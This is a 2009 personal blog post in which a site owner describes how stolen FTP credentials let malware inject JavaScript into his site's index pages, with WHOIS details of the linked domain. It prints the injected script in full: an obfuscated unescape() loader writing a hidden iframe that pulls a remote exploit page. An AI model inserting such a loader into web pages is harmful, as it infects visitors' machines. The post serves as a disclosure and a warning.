Archive for November, 2009

Somehow my FTP password was hacked and this bit of JavaScript was inserted into all of the index.php files that run this site!

I found out through this email from Google – glad they told me as otherwise I may not have known!

hackedemail

Apparently this hack is a virus which uses stolen FTP password information then injects this bit of code to pages on the server without you realising it.  Where they got my password from I’m not sure, though I suspect it might have been my old work machine.  Really Pissed

This will cause someone who visits the site to run the script, where an exploit kit will test various exploits against the browser and various other installed applications.  Once there is a succcessfull infection various malware packages will be downloaded onto the machine.

According to here:

Once installed the malware, scours the machines stored  looking for stored FTP login credentials, then once such logins are found it sends this data to a server located in the Cayman Islands! Additionally, there is another component used, which acts as a script injector. This makes a call to a certain script on the server in the Cayman Islands, using domain goooodbill.cn This script gives the infected client a url in the format USERNAME: PASSWORD@FTP.ADDRESS.COM, the client then logs in to the given ftp site and modifies all index pages (asp,php,html) and injects the script. Once injected all visitors of the modified domain potentially become part of the infection network/cycle.

This is pretty sophisticated stuff and allows criminals to get access to lots and lots of machines and steal passwords/data that can be used in criminal activities i.e. emptying somebones bank account or stealing their identity.

One thing I find odd about this is that it goes through a Chinese domain called goooodbill.cn, which apparently was registered by a technology company in north east Xiaman.  Wonder if this really is from China as it looks to me like this domain has just been used  as a front – the name ‘MichellGregory’ looks fake to me!  Soldier

Domain Name: goooodbill.cn
ROID: 20090224s10001s39666572-cn
Domain Status: ok
Registrant Organization: DomainsReg
Registrant Name: MichellGregory
Administrative Email: 
Sponsoring Registrar: 厦门东南融通在线科技有限公司
Name Server:ns1.sikkaro.com
Name Server:ns2.sikkaro.com
Registration Date: 2009-02-24 08:41
Expiration Date: 2010-02-24 08:41

Here’s the full script if anyone’s interested

<script>var fr=unescape(‘%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%66%6f%70%73%6c%2e%63%6e%2f%66%6f%72%75%6d%2f%69%6e%64%65%78%2e%70%68%70%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%66%72%61%6d%65%62%6f%72%64%65%72%3d%30%3e%3c%2f%69%66%72%61%6d%65%3e’ document.write(fr);</script>


我现在在伦敦
I'm no longer in Changchun, but back in London living the daily grind. I'll continue to update this blog from time-to- time with things that interest me
Tao Quotes
Because of a great love, one is courageous.
Lao Tzu
Quotes from Secret Chalice
Calendar 日历
November 2009
M T W T F S S
« Sep    
 1
2345678
9101112131415
16171819202122
23242526272829
30  
Clustrmaps
Recent Visitors:
博客搜索
Time 时间

Changchun 长春
03-12-2010 8:54 am
London 伦敦
03-12-2010 1:54 am
WeatherPixie
Gallery 照片
IM Online 我的联络方式
MSN StatusSkype Status

Listed on BlogShares This is my Google PageRank™ - SmE Rank free service Powered by Scriptme expatriate RankingBlogs.com :: Defining Your Blogs Worth: TopSites: Who links to my website?